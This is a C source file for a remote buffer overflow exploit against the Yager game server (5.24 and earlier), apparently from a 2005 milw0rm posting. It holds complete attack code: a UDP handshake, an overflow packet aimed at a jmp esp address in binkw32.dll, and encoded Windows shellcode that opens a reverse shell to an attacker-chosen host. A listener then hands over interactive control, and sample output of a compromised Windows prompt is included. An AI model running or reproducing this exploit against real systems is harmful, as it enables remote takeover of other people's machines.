423 lines
No EOL
11 KiB
C
423 lines
No EOL
11 KiB
C
/*
|
|
*
|
|
* Yager <= 5.24 Remote Buffer Overflow Exploit
|
|
*
|
|
* cybertronic[at]gmx[dot]net
|
|
* 04/25/2005
|
|
*
|
|
* send all the money to Luigi Auriemma
|
|
* __ __ _
|
|
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
|
|
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
|
|
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
|
|
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
|
|
* /____/
|
|
*
|
|
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
|
|
* --[ select target
|
|
* --[ 0 [0xdeadc0de] crash server
|
|
* --[ 1 [0x300686bd] binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]
|
|
* >> 1
|
|
* --[ sending handshake [UDP]...done!
|
|
* --[ reading server response [UDP]...done!
|
|
* --[ server port: 1089
|
|
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
|
|
* --[ exploiting WinXP Pro SP1 GER
|
|
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
|
|
* --[ exploiting packet overflow...
|
|
* --[ sending packet...done!
|
|
* --[ starting reverse handler [port: 1337]...done!
|
|
* --[ incomming connection from: 192.168.2.100
|
|
* --[ b0x pwned - h4ve phun
|
|
* Microsoft Windows XP [Version 5.1.2600]
|
|
* (C) Copyright 1985-2001 Microsoft Corp.
|
|
*
|
|
* C:\Yager>
|
|
*
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <netdb.h>
|
|
|
|
#define PORT_UDP 34855
|
|
|
|
#define RED "\E[31m\E[1m"
|
|
#define GREEN "\E[32m\E[1m"
|
|
#define YELLOW "\E[33m\E[1m"
|
|
#define BLUE "\E[34m\E[1m"
|
|
#define NORMAL "\E[m"
|
|
|
|
/*
|
|
*
|
|
* prototypes
|
|
*
|
|
*/
|
|
|
|
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, unsigned long ret );
|
|
int isip ( char *ip );
|
|
int send_handshake ( int s, struct sockaddr_in remote_addr );
|
|
int shell ( int s, char* tip, unsigned short cbport );
|
|
|
|
void header ();
|
|
void start_reverse_handler ( char* argv3 );
|
|
|
|
/*********************
|
|
* Windows Shellcode *
|
|
*********************/
|
|
|
|
/*
|
|
* Type : connect back shellcode
|
|
* Length: 316 bytes
|
|
* CBIP : reverseshell[111] ( ^ 0x99999999 )
|
|
* CBPort: reverseshell[118] ( ^ 0x9999 )
|
|
*
|
|
*/
|
|
|
|
unsigned char reverseshell[] =
|
|
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
|
|
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
|
|
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
|
|
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
|
|
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
|
|
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
|
|
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
|
|
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
|
|
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
|
|
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
|
|
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
|
|
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
|
|
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
|
|
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
|
|
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
|
|
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
|
|
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
|
|
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
|
|
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
|
|
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
|
|
|
|
/*
|
|
*
|
|
* structures
|
|
*
|
|
*/
|
|
|
|
struct targets {
|
|
int num;
|
|
unsigned long ret;
|
|
char name[64];
|
|
}
|
|
target[]= {
|
|
{ 0, 0xdeadc0de, "crash server" },
|
|
{ 1, 0x300686bd, "binkw32.dll ver: 1.5.11.0 [ Working on WinXP Pro SP1 GER]" } //push esp in binkw32.dll
|
|
};
|
|
|
|
/*
|
|
*
|
|
* functions
|
|
*
|
|
*/
|
|
|
|
int
|
|
exploit ( int s, unsigned long xoredcbip, unsigned short xoredcbport, unsigned long ret )
|
|
{
|
|
int r;
|
|
char buffer_pack[592];
|
|
|
|
printf ( "--[ exploiting WinXP Pro SP1 GER\n" );
|
|
printf ( "--[ ret: 0x%08x [ jmp esp in binkw32.dll ]\n", ret );
|
|
|
|
memcpy ( &reverseshell[111], &xoredcbip, 4);
|
|
memcpy ( &reverseshell[118], &xoredcbport, 2);
|
|
|
|
r = ~time ( NULL ) & 0xffff;
|
|
printf ( "--[ exploiting packet overflow...\n" );
|
|
bzero ( &buffer_pack, sizeof ( buffer_pack ) );
|
|
memset ( buffer_pack, 0x41, 268 );
|
|
strncat ( buffer_pack, ( unsigned char* ) &ret, 4 );
|
|
strncat ( buffer_pack, "\x41\x41\x41\x41", 4 ); //4 bytes padding
|
|
memcpy ( buffer_pack + 276, reverseshell, sizeof ( reverseshell ) - 1 );
|
|
buffer_pack[0] = 0x00;
|
|
buffer_pack[1] = 0x00;
|
|
buffer_pack[2] = 0x00;
|
|
buffer_pack[3] = 0x00;
|
|
buffer_pack[4] = 0x46; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
|
|
buffer_pack[5] = 0x02; //sizeof ( buffer_pack ) - 0xa; 582d / 246h
|
|
buffer_pack[6] = ( r & 0x00ff );
|
|
buffer_pack[7] = ( ( r & 0xff00 ) >> 8 );
|
|
buffer_pack[8] = 0x00;
|
|
buffer_pack[9] = 0x00;
|
|
printf ( "--[ sending packet..." );
|
|
if ( write ( s, buffer_pack, sizeof ( buffer_pack ) ) <= 0 )
|
|
{
|
|
printf ( "failed!\n" );
|
|
return ( 1 );
|
|
}
|
|
printf ( "done!\n" );
|
|
return ( 0 );
|
|
}
|
|
|
|
int
|
|
isip ( char *ip )
|
|
{
|
|
int a, b, c, d;
|
|
|
|
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
|
|
return ( 0 );
|
|
if ( a < 1 )
|
|
return ( 0 );
|
|
if ( a > 255 )
|
|
return 0;
|
|
if ( b < 0 )
|
|
return 0;
|
|
if ( b > 255 )
|
|
return 0;
|
|
if ( c < 0 )
|
|
return 0;
|
|
if ( c > 255 )
|
|
return 0;
|
|
if ( d < 0 )
|
|
return 0;
|
|
if ( d > 255 )
|
|
return 0;
|
|
return 1;
|
|
}
|
|
|
|
int
|
|
send_handshake ( int s, struct sockaddr_in remote_addr )
|
|
{
|
|
char* p;
|
|
char crap[23];
|
|
char in[2048];
|
|
unsigned short port;
|
|
|
|
bzero ( &crap, sizeof ( crap ) );
|
|
crap[0] = 0x59;
|
|
crap[1] = 0x5f;
|
|
crap[2] = 0x4e;
|
|
crap[3] = 0x45;
|
|
crap[4] = 0x54;
|
|
crap[5] = 0x5f;
|
|
crap[6] = 0x59;
|
|
crap[7] = 0x41;
|
|
crap[8] = 0x47;
|
|
crap[9] = 0x45;
|
|
crap[10] = 0x52;
|
|
crap[11] = 0x5f;
|
|
crap[12] = 0x43;
|
|
crap[13] = 0x4c;
|
|
crap[14] = 0x49;
|
|
crap[15] = 0x45;
|
|
crap[16] = 0x4e;
|
|
crap[17] = 0x54;
|
|
crap[18] = 0x00;
|
|
*( u_short* ) ( crap + 19 ) = ~time ( NULL );
|
|
crap[21] = 0x00;
|
|
crap[22] = 0x00;
|
|
printf ( "--[ sending handshake [UDP]..." );
|
|
if ( sendto ( s, crap, sizeof ( crap ), 0, ( struct sockaddr* ) &remote_addr, sizeof ( remote_addr ) ) < 0 )
|
|
{
|
|
printf ( "failed!\n" );
|
|
return ( 1 );
|
|
}
|
|
printf ( "done!\n" );
|
|
printf ( "--[ reading server response [UDP]..." );
|
|
bzero ( &in, sizeof ( in ) );
|
|
if ( recvfrom ( s, in, sizeof ( in ) -1, 0, NULL, NULL ) < 0 )
|
|
{
|
|
printf ( "failed!\n" );
|
|
return ( 1 );
|
|
}
|
|
printf ( "done!\n" );
|
|
p = in + 19;
|
|
port = ntohs ( *( u_short * ) p );
|
|
printf ( "--[ server port: %d\n", port );
|
|
return ( port );
|
|
}
|
|
|
|
int
|
|
shell ( int s, char* tip, unsigned short cbport )
|
|
{
|
|
int n;
|
|
char buffer[2048];
|
|
fd_set fd_read;
|
|
|
|
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
|
|
|
|
FD_ZERO ( &fd_read );
|
|
FD_SET ( s, &fd_read );
|
|
FD_SET ( 0, &fd_read );
|
|
|
|
while ( 1 )
|
|
{
|
|
FD_SET ( s, &fd_read );
|
|
FD_SET ( 0, &fd_read );
|
|
|
|
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
|
|
break;
|
|
if ( FD_ISSET ( s, &fd_read ) )
|
|
{
|
|
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
|
|
{
|
|
printf ( "bye bye...\n" );
|
|
return;
|
|
}
|
|
if ( write ( 1, buffer, n ) < 0 )
|
|
{
|
|
printf ( "bye bye...\n" );
|
|
return;
|
|
}
|
|
}
|
|
if ( FD_ISSET ( 0, &fd_read ) )
|
|
{
|
|
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
|
|
{
|
|
printf ( "bye bye...\n" );
|
|
return;
|
|
}
|
|
if ( send ( s, buffer, n, 0 ) < 0 )
|
|
{
|
|
printf ( "bye bye...\n" );
|
|
return;
|
|
}
|
|
}
|
|
usleep(10);
|
|
}
|
|
}
|
|
|
|
void
|
|
header ()
|
|
{
|
|
printf ( " __ __ _ \n" );
|
|
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
|
|
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
|
|
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
|
|
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
|
|
printf ( " /____/ \n\n" );
|
|
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
|
|
}
|
|
|
|
void
|
|
start_reverse_handler ( char* argv3 )
|
|
{
|
|
int s1, s2;
|
|
unsigned short cbport;
|
|
struct sockaddr_in cliaddr, servaddr;
|
|
socklen_t clilen = sizeof ( cliaddr );
|
|
|
|
sscanf ( argv3, "%u", &cbport );
|
|
|
|
bzero ( &servaddr, sizeof ( servaddr ) );
|
|
servaddr.sin_family = AF_INET;
|
|
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
|
|
servaddr.sin_port = htons ( cbport );
|
|
|
|
printf ( "--[ starting reverse handler [port: %u]...", cbport );
|
|
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
|
|
{
|
|
printf ( "socket failed!\n" );
|
|
exit ( 1 );
|
|
}
|
|
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
|
|
if ( listen ( s1, 1 ) == -1 )
|
|
{
|
|
printf ( "listen failed!\n" );
|
|
exit ( 1 );
|
|
}
|
|
printf ( "done!\n" );
|
|
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
|
|
{
|
|
printf ( "accept failed!\n" );
|
|
exit ( 1 );
|
|
}
|
|
close ( s1 );
|
|
printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
|
|
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
|
|
close ( s2 );
|
|
}
|
|
|
|
int
|
|
main ( int argc, char* argv[] )
|
|
{
|
|
int s1, s2, targ, i;
|
|
unsigned long xoredcbip;
|
|
unsigned short cbport, xoredcbport, port;
|
|
struct sockaddr_in remote_addr;
|
|
struct hostent* host_addr;
|
|
|
|
if ( argc != 4 )
|
|
{
|
|
printf ( "Usage: %s <ip> <cbip> <cbport>\n", argv[0] );
|
|
exit ( 1 );
|
|
}
|
|
system ( "clear" );
|
|
header ();
|
|
if ( !isip ( argv[1] ) )
|
|
{
|
|
printf ( "Invalid Target IP!\n" );
|
|
exit ( 1 );
|
|
}
|
|
if ( !isip ( argv[2] ) )
|
|
{
|
|
printf ( "Invalid connect back IP!\n" );
|
|
exit ( 1 );
|
|
}
|
|
printf("--[ select target\n");
|
|
for ( i = 0; i < 2; i++ )
|
|
printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
|
|
printf ( " >> " );
|
|
scanf ( "%d", &targ );
|
|
if ( targ != 0 )
|
|
if ( targ != 1 )
|
|
{
|
|
printf ( "--[ invalid target!\n" );
|
|
exit ( 1 );
|
|
}
|
|
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
|
|
{
|
|
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
|
|
exit ( 1 );
|
|
}
|
|
remote_addr.sin_family = AF_INET;
|
|
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
|
|
remote_addr.sin_port = htons ( PORT_UDP );
|
|
if ( ( s1 = socket ( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
|
|
{
|
|
printf ( "socket failed!\n" );
|
|
exit ( 1 );
|
|
}
|
|
if ( ( port = send_handshake ( s1, remote_addr ) ) == 1 )
|
|
{
|
|
printf ( "handshake FAILED!\n" );
|
|
exit ( 1 );
|
|
}
|
|
close ( s1 );
|
|
if ( ( s2 = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
|
|
{
|
|
printf ( "socket failed!\n" );
|
|
exit ( 1 );
|
|
}
|
|
printf ( "--[ connecting to %s:%u [TCP]...", argv[1], port );
|
|
remote_addr.sin_port = htons ( port );
|
|
if ( connect ( s2, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
|
|
{
|
|
printf ( "failed!\n" );
|
|
exit ( 1 );
|
|
}
|
|
printf ( "done!\n" );
|
|
|
|
xoredcbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
|
|
xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
|
|
|
|
if ( exploit ( s2, xoredcbip, xoredcbport, target[targ].ret ) == 1 )
|
|
{
|
|
printf ( "exploitation FAILED!\n" );
|
|
exit ( 1 );
|
|
}
|
|
close ( s2 );
|
|
start_reverse_handler ( argv[3] );
|
|
}
|
|
|
|
// milw0rm.com [2005-04-25]
|